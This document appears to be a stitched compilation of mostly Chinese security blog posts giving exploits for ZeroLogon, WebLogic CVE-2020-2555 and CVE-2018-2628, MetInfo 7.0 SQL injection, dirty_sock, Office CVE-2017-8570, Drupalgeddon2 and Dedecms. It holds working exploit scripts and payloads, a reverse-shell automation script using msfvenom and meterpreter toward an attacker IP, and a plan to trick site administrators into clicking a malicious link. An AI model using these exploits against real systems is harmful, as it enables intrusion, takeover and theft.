Requires the latest impacket from GitHub with added netlogon structures.

Do note that by default this changes the password of the domain controller account. Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this!

More info and original research here

Exploit steps

• Read the blog/whitepaper above so you know what you’re doing
• Run cve-2020-1472-exploit.py with IP and netbios name of DC
• DCSync with secretsdump, using -just-dc and -no-pass or empty hashes and the DCHOSTNAME$ account

Restore steps

If you make sure that this line in secretsdump passes (so make it if True: for example) secretsdump will also dump the plaintext (hex encoded) machine account password from the registry. You can do this by running it against the same DC and using a DA account.

Alternatively you can dump this same password by first extracting the registry hives and then running secretsdump offline (it will then always print the plaintext key because it can’t calculate the Kerberos hashes, this saves you modifying the library).

With this password you can run restorepassword.py with the -hexpass parameter. This will first authenticate with the empty password to the same DC and then set the password back to the original one. Make sure you supply the netbios name and IP again as target, so for example:

python restorepassword.py testsegment/s2016dc@s2016dc -target-ip 192.168.222.113 -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3...etc

2020.03.06 早上4点，看到了清水川崎师傅推送了Weblogic CVE-2020-2555的通告，在推特上搜了一波，发现有详细的分析文章，遂有此文。

漏洞分析

个人研究，没钱买补丁，这里借用Zero Day的图。

补丁中将LimitFilter类的toString()方法中的extract()方法调用全部移除，而我们需要知道在CommonsCollections5中可以利用BadAttributeValueExpException来调用任意类的toString()方法。

接着来看下没打补丁之前LimitFilter类的toString()方法。

public String toString() {
    StringBuilder sb = new StringBuilder("LimitFilter: (");
    sb.append(this.m_filter).append(" [pageSize=").append(this.m_cPageSize).append(", pageNum=").append(this.m_nPage);
    if (this.m_comparator instanceof ValueExtractor) {
        ValueExtractor extractor = (ValueExtractor)this.m_comparator;
        sb.append(", top=").append(extractor.extract(this.m_oAnchorTop)).append(", bottom=").append(extractor.extract(this.m_oAnchorBottom));
    } else if (this.m_comparator != null) {
        sb.append(", comparator=").append(this.m_comparator);
    }

    sb.append("])");
    return sb.toString();
}

toString()中会将this.m_oAnchorTop和this.m_oAnchorBottom作为参数传入ValueExtractor.extract()，补丁移除了extractor.extract()操作，跟进extract()看下，发现extract()只是一个抽象方法，并没有实现，那说明extract()在ValueExtractor的子类中可以利用。因为是反序列化，所以我们只需要在ValueExtractor子类中找到实现了Serializable或者ExternalizableLite反序列化接口并且有extract()的方法。最终在com.tangosol.util.extractor.ReflectionExtractor#extract()找到了反射任意方法调用。

public E extract(T oTarget) {
    if (oTarget == null) {
        return null;
    } else {
        Class clz = oTarget.getClass();

        try {
            Method method = this.m_methodPrev;
            if (method == null || method.getDeclaringClass() != clz) {
                this.m_methodPrev = method = ClassHelper.findMethod(clz, this.getMethodName(), ClassHelper.getClassArray(this.m_aoParam), false);
            }

            return method.invoke(oTarget, this.m_aoParam);
        } catch (NullPointerException var4) {
            throw new RuntimeException(this.suggestExtractFailureCause(clz));
        } catch (Exception var5) {
            throw ensureRuntimeException(var5, clz.getName() + this + '(' + oTarget + ')');
        }
    }
}

到现在为止我们可以传入一个Runtime.getRuntime()的oTarget，将this.m_methodPrev赋值为exec，然后this.m_aoParam就是我们的命令参数，就可以RCE了。而对于反序列化而言，我们需要继续构建对象，让他自己执行Runtime.getRuntime()，这里很像cc链中的InvokerTransformer.transform()，那有没有像cc链中的ChainedTransformer类呢。遂找到了com.tangosol.util.extractor.ChainedExtractor#extract()

@JsonbCreator
public ChainedExtractor(@JsonbProperty("extractors") ValueExtractor[] aExtractor) {
    super(aExtractor);
    this.m_nTarget = this.computeTarget();
}
public E extract(Object oTarget) {
    ValueExtractor[] aExtractor = this.getExtractors();
    int i = 0;

    for(int c = aExtractor.length; i < c && oTarget != null; ++i) {
        oTarget = aExtractor[i].extract(oTarget);
    }

    return oTarget;
}

和cc5的构造很像，我们一步一步构造下

// Runtime.class.getRuntime()
ReflectionExtractor extractor1 = new ReflectionExtractor(
    "getMethod",
    new Object[]{"getRuntime", new Class[0]}

);

// get invoke() to execute exec()
ReflectionExtractor extractor2 = new ReflectionExtractor(
    "invoke",
    new Object[]{null, new Object[0]}

);

// invoke("exec","calc")
ReflectionExtractor extractor3 = new ReflectionExtractor(
    "exec",
    new Object[]{new String[]{"/bin/bash", "-c", "curl http://172.16.1.1/success"}}
);

首先先构造三个ReflectionExtractor对象来调用反射拿到我们想要的，然后把他放到ReflectionExtractor数组中，将数组通过构造函数赋值给ChainedExtractor。

ReflectionExtractor[] extractors = {
    extractor1,
    extractor2,
    extractor3,
};

ChainedExtractor chainedExtractor = new ChainedExtractor(extractors);

那到目前为止，只要反序列化执行了chainedExtractor.extract()就可以造成rce。而前文所说，toString()中是执行了extract()的，所以我们将chainedExtractor通过反射赋值给limitFilter对象。然后通过BadAttributeValueExpException触发limitFilter对象的toString()，进而触发extract()一步一步调用method.invoke()，继而通过反射拿到Runtime.getRuntime().exec("")，达成RCE。

坑

1. coherence.jar要使用和目标版本一致的，不然会有serialVersionUID不一致的问题。
2. BadAttributeValueExpException对jdk的版本有要求。具体看这里

漏洞利用

https://github.com/Y4er/CVE-2020-2555

参考

1. https://www.zerodayinitiative.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server
2. https://github.com/JetBrains/jdk8u_jdk/commit/af2361ee2878302012214299036b3a8b4ed36974#diff-f89b1641c408b60efe29ee513b3d22ffR76
3. https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections5.java

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

跟汤姆表哥再搞创宇的年度任务🤒，昨天发了metinfo6.2.0的组合拳，今天看了看官网有最新版的7.0，就下下来看了看，发现两枚注入，而且昨天的组合拳增加了后缀校验，绕不过去了，呜呜呜。

sql injection 1

全局搜索where

app/system/parameter/include/class/parameter_op.class.php:165

public function paratem($listid = '',$module = '',$class1 = '',$class2 = '',$class3 = ''){
    global $_M;

    $paralist = $this->get_para_list($module,$class1,$class2,$class3);
    foreach ($paralist as $key => $para) {
        $list = $this->parameter_database->get_parameters($module,$para['id']);
        $paralist[$key]['list'] = $list;
        if($para['type'] ==4 || $para['type'] ==2 || $para['type'] ==6){
            $values = array();
            foreach ($list as $val) {
                $query = "SELECT * FROM {$_M['table']['plist']} WHERE listid = {$listid} AND paraid={$para['id']} AND module={$module} AND info = '{$val['id']}' AND lang = '{$_M['lang']}'";
                $para_value = DB::get_one($query);
                if($para_value){
                    $values[] = $para_value['info'];
                }
            }
            $query = "SELECT * FROM {$_M['table']['plist']} WHERE listid = {$listid} AND paraid={$para['id']} AND module={$module} AND lang = '{$_M['lang']}'";
            $para_value = DB::get_one($query);
            $values = $para_value['info'];
        }else{
            $query = "SELECT * FROM {$_M['table']['plist']} WHERE listid = {$listid} AND paraid={$para['id']} AND module={$module} AND lang = '{$_M['lang']}'";
            $para_value = DB::get_one($query);
            $values = $para_value['info'];
        }


        if(is_array($values)){
            $paralist[$key]['value'] = implode('|', $values);
        }else{
            $paralist[$key]['value'] = $values;
        }
    }
    return $paralist;
    ##require PATH_WEB.'app/system/include/public/ui/admin/paratype.php';
}

发现{$listid}直接被拼接进sql语句，且listid是函数直接传进来的参数，搜索哪些函数调用了这个函数

app/system/product/admin/product_admin.class.php:171

public function dopara() {
    global $_M;
    if($_M['form']['app_type']=='shop'){
        $class1 = $_M['form']['class1'];
        $class2 = $_M['form']['class2'];
        $class3 = $_M['form']['class3'];
        $paralist = $this->para_op->paratem($_M['form']['id'],$this->module,$class1,$class2,$class3);
        require PATH_WEB . 'app/system/include/public/ui/admin/paratype.php';
    }else{
        parent::dopara();
    }
}

$_M['form']['id']可控，那么sql语句就可控。

payload

http://php.local/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=2 union SELECT 1,2,3,user(),5,6,7 limit 5,1  -- +

sql injection 2

app/system/language/admin/language_general.class.php:108

public function doget_admin_pack($appno,$site,$editor)
{
    global $_M;
    $sql = $appno ? "AND app = {$appno}" : '';
    $language_data = array();
    if ($site == 'admin') {
        $query = "SELECT name,value FROM {$_M['table']['language']} WHERE lang='{$editor}' AND site ='1' {$sql}";
        $language_data = DB::get_all($query);
        $lang_pack_url = PATH_WEB . 'cache/language_admin_' . $editor . '.ini';
    } else if ($site == 'web') {
        $query = "SELECT name,value FROM {$_M['table']['language']} WHERE lang='{$editor}' AND site ='0' {$sql}";
        $language_data = DB::get_all($query);
        $lang_pack_url = PATH_WEB . 'cache/language_web_' . $editor . '.ini';
    }

    foreach ($language_data as $key => $val) {
        file_put_contents($lang_pack_url, $val['name'] . '=' . $val['value'] . PHP_EOL, FILE_APPEND);
    }
}

$appno直接拼接 当site等于web或者admin时造成sql注入

找下有没有调用这个函数传参的

app/system/language/admin/language_general.class.php:90

public function doExportPack()
{
    global $_M;

    if (!isset($_M['form']['editor']) || !$_M['form']['editor']) {
        $this->error($_M['word']['js41']);
    }

    $editor = $_M['form']['editor'];
    $site = isset($_M['form']['site']) ? $_M['form']['site'] : '';
    $appno = $_M['form']['appno'] ? $_M['form']['appno'] : '';
    $filename = PATH_WEB . 'cache/language_' . $site . '_' . $editor . '.ini';

    delfile($filename);

    //获取后台语言包
    $this->doget_admin_pack($appno,$site,$editor);

    $filename = realpath($filename);
    header("");
    Header("Content-type:  application/octet-stream ");
    Header("Accept-Ranges:  bytes ");
    Header("Accept-Length: " . filesize($filename));
    header("Content-Disposition:  attachment;  filename=language_{$site}_" . $appno .'_'. $editor . ".ini");
    //写日志
    $log_name = $_M['form']['site'] ? 'langadmin' : 'langweb';
    logs::addAdminLog($log_name,'language_outputlang_v6','jsok','doExportPack');
    readfile($filename);
}

看下代码，首先要传递参数editor跳出第一个if语句块，然后site和appno直接传入doget_admin_pack()函数，参数都可控，妥妥的注入。

payload

POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1
Host: php.local
Content-Length: 58
Origin: http://php.local/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: XDEBUG_SESSION=PHPSTORM; PHPSESSID=40d2af28a4c309bbb824dc957af59b11; arrlanguage=metinfo; re_url=http%3A%2F%2Fphp.local%2Fadmin%2F; met_auth=65acz4xG7IkP%2BqmPuO%2FIvPsKt4luK6Te34p%2F2BHXEosgKHUwk8dKQRHs7y4Ea9mCH1egudtuz%2Bl02L3eIhMLs7%2FDMw; met_key=PLBqK9J; page_iframe_url=http%3A%2F%2Fphp.local%2Findex.php%3Flang%3Dcn%26pageset%3D1
Connection: close

appno= 1 union SELECT user(),database()&editor=cn&site=web

组合拳

在前文中提到了metinfo6.2.0配合注入getshell的姿势，但是在metinfo7.0中增加了后缀校验，无法getshell，很可惜。

app/system/include/class/web.class.php:757

if (stristr($filename, '.php')) {
    jsoncallback(array('suc' => 0));
}

但是这个点仍然可以上传其他后缀的文件，通过这个点配合解析漏洞或者文件包含来getshell未免不可行。

想到了htaccess和.user.ini的同学别费力气了，写文件没办法换行，如果有师傅有新姿势，欢迎评论指点啊！

总结

metinfo7.0的注入实际上还有很多，不过很多都是delete型的注入，我在这里挑了两个回显的注入，欢迎师傅们补充交流。

CVE-2019-16997
CVE-2019-16996

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

漏洞原因

默认情况下，Ubuntu附带了snapd，但是如果安装了这个软件包，任何发行版都应该可利用。运行以下命令，如果你snapd是2.37.1或更高，你是安全的。

影响版本

• Ubuntu 18.10
• Ubuntu 18.04 LTS
• Ubuntu 16.04 LTS
• Ubuntu 14.04 LTS

漏洞利用

poc链接：https://github.com/initstring/dirty_sock

方法一

先在Ubuntu SSO创建账号，然后本地生成密钥：

然后把当前用户下/.ssh/目录下的id_rsa.pub（公钥）拷到你账户的ssh-keys中。

执行第一个poc

出现错误，因为没有开启ssh服务。

重新执行下

如果成功，sudo -i即可获取root权限。

方法二

直接执行poc

如果成功，会创建一个账号密码都为dirty_sock的用户，su命令切换过去，然后通过sudo就可以切换为root了。

如果遇到了No passwd entry for user 'dirty_sock'的问题，则查看下图中的任务进度，等到doing任务执行完之后再进行尝试，如果仍不行，请使用方法一。

参考链接

https://usn.ubuntu.com/3887-1/

https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SnapSocketParsing

https://github.com/initstring/dirty_sock

影响版本

影响范围：

Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)

自动化脚本

attack_ip="192.168.1.212"
LPORT="6666"
DIR="/var/cve2017"

if [ -d ${DIR} ]; then
    rm -rf ${DIR}
    mkdir ${DIR}
else
    mkdir ${DIR}
fi
cd $DIR
`git clone https://github.com/tezukanice/Office8570.git`
cd Office8570
mkdir template
mv template.ppsx template/template.ppsx
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://$attack_ip/"/logo.doc"
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=${attack_ip} LPORT=${LPORT} -f exe > ${DIR}/shell.exe`

gnome-terminal -e "python cve-2017-8570_toolkit.py -M exp -e http://${attack_ip}/shell.exe -l ${DIR}/shell.exe"

`service postgresql start`
if [ -f "exp.rc" ]; then
    rm "exp.rc"
fi
echo "use exploit/multi/handler">>exp.rc
echo "set LHOST "$attack_ip>>exp.rc
echo "set LPORT "$LPORT>>exp.rc
echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp">>exp.rc
echo "exploit">>exp.rc
gnome-terminal -e "msfconsole -r exp.rc"

参考链接

1. https://github.com/tezukanice/Office8570

2. https://xz.aliyun.com/t/3772

3. https://github.com/Drac0nids/CVE-2017-8570

2.复现过程
目标环境：虚拟机windows 8
IP: 192.168.192.141

受影响版本为Windows 8.1和Windows server 2012 R2，这里选取了Windows8.1。

攻击端环境：Kali Linux
IP：192.168.192.139

运行PoC脚本等待靶机访问。

靶机中输入Kali Linux的IP访问。

触发BSoD。

3.参考链接
https://krbtgt.pw/smbv3-null-pointer-dereference-vulnerability/
https://www.exploit-db.com/exploits/44189/

http://www.lengbaikai.net/?p=250

今早，朋友圈就刷爆了这个漏洞，但是目前只有POC验证脚本放出，后续有exp放出时，我会继续更新这篇博文。

0x01 综述

当地时间4月17日，北京时间4月18日凌晨，Oracle官方发布了4月份的关键补丁更新CPU（Critical Patch Update）,其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628)，这个漏洞是我在去年11月份报给Oracle的，通过该漏洞，攻击者可以在未授权的情况下远程执行任意代码。

参考链接：

http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html

漏洞影响范围

Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.2
Weblogic 12.2.1.3

0x02 复现

目前流传比较广的是weblogic_poc.client1.for.scan-cve-2018-2628.py这个验证脚本，我们来开一个weblogic玩玩~

OK打开正常，这里的版本是12c

#!env python
#coding=utf-8
#
# Author:       liaoxinxi@nsfocus.com
#
# Created Time: Wed 19 Jul 2017 01:47:53 AM CST
#
# FileName:     weblogic_poc.py
#
# Description:
#
# ChangeLog:
# -*- coding: utf-8 -*-
import socket
import time
import re
VUL=['CVE-2018-2628']
PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078']
VER_SIG=['\\$Proxy[0-9]+']
def t3handshake(sock,server_addr):
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    print 'handshake successful'
def buildT3RequestObject(sock,port):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
def sendEvilObjData(sock,data):
    payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    time.sleep(2)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception as e:
        pass
    return res
def checkVul(res,server_addr,index):
    p=re.findall(VER_SIG[index], res, re.S)
    if len(p)>0:
        print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
    else:
        print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
def run(dip,dport,index):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
    sock.settimeout(65)
    server_addr = (dip, dport)
    t3handshake(sock,server_addr)
    buildT3RequestObject(sock,dport)
    rs=sendEvilObjData(sock,PAYLOAD[index])
    print 'rs',rs
    checkVul(rs,server_addr,index)
if __name__=="__main__":
    dip = '218.1.102.99'
    dip = '10.65.46.125'
    dip = '192.168.3.216'
    dport = 7001
    run(dip,dport,0)
#    for i in range(0,len(VUL)):
#        run(dip,dport,i)

这里只是验证存在漏洞，我会持续关注，待能执行命令的exp放出来之后我会接着更新。

Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code .

影响版本

1. Drupal 6
2. Drupal 7
3. Drupal 8

修复建议

Drupal 6.x的修复参考以下网站：

https://www.drupal.org/project/d6lts

Drupal 7.x请升级到Drupal 7.5.8版本，

同时官方给出7.X补丁，若用户无法立即升级版本，请更新补丁，补丁地址为：

https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5

Drupal 8.5.x请升级到Drupal 8.5.1版本

同时官方给出8.5.X补丁，若用户无法立即升级版本，请更新补丁，补丁地址为：

https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f

Drupal 8.3.x和8.4.x版本官方已不进行维护，但此漏洞非常严重，官方此次也给出了对应补丁，补丁同8.5.x版本：补丁地址为：

https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f

由于Drupal 8.3.x和8.4.x版本官方已不进行维护，建议用户最好升级到官方维护的Drupal 8.3.9以及Drupal 8.4.6版本

友情提示

Drupal 8.0.x、Drupal 8.1.x、Drupal 8.2.x官方已不再维护，请各位用户升级到官方维护的版本

EXP

#!/usr/bin/env
import sys
import requests
print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')
target = input('Enter target url (example: https://domain.ltd/): ')
url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo ";-)" | tee hello.txt'}
r = requests.post(url, data=payload)
if r.status_code != 200:
  sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')

原文地址 https://xz.aliyun.com/t/2234

Dedecms V5.7版本后台可实现对于文件的重命名，可将上传的任意文件重名为php文件，导致getshell。

该漏洞的逻辑比较简单，就从漏洞的入口文件开始看，漏洞的入口文件是dede/file_manage_control.php，其部分源码如下：

重点就在于这里的if，由于dede采取的是伪全局变量注册机制，导致在未经过滤的情况下我们可声明任意变量。在该文件中，前面只是简单的验证身份是否正确，并没有对于变量进行任何过滤。也就是说，我们可控$fmdo,$oldfilename,$newfilename这三个变量。

跟进RenameFile方法，文件位于dede/file_class.php：

在这个方法中，对于传入的变量只是进行参数拼接操作，就是我们传入的参数前加上web服务的根目录的绝对路径。对于之后的变量没有任何过滤。导致我们可操作自行上传的文件。从而实现将任意类型文件重命名为php文件。

利用方式：
首先随便找个上传点，上传合法文件。获取上传之后的文件路径。
这里我找的是前台->会员中心->附件管理，从这上传一个zip文件，内容就是phpinfo()

可以在源码里看到上传文件的路径：

接下来构造触发重命名payload：
将文件路径的值填入oldfilename参数，这里注意不要加反斜杠
newfilename的值就是我们要生成的木马文件的名称。（由于我的dede并不是放在web服务的根目录下，因此我这里需要加上dedecms/）
fmdo构造为rename即可
最终生成以下poc:

http://localhost/dedecms2/dede/file_manage_control.php?fmdo=rename&oldfilename=dedecms2/uploads/userup/1/151QM125-42I.zip&newfilename=dedecms2/wisdom.php

执行之后访问：http://localhost/dedecms2/wisdom.php

配合存储型xss可getshell。

修复方案：在file_class.php中过滤$newname参数，或者file_manage_control.php中过滤$newfilename参数，判断文件后缀是否为php

mochazz:可以利用这个文件名任意修改的漏洞结合CSRF以及一点点社工手段打出组合拳。具体手法如下：

• 利用dede前台会员上传点上传文件，获取路径
• 构造攻击url
• 将一长长的恶意url变成短连接
• 社工网站管理员，让其点击
• 成功getshell

不过有一点不够隐蔽，就是在管理员点击链接后，会提示成功修改文件名，这个可能会引起细心的管理员的警觉。

POC:

http://localhost/后台地址/tag_test_action.php?url=a&token=&partcode={dede:field name='source' runphp='yes'}phpinfo();{/dede:field}

利用条件：登录后台
解决方案：重新实现csrf_check()函数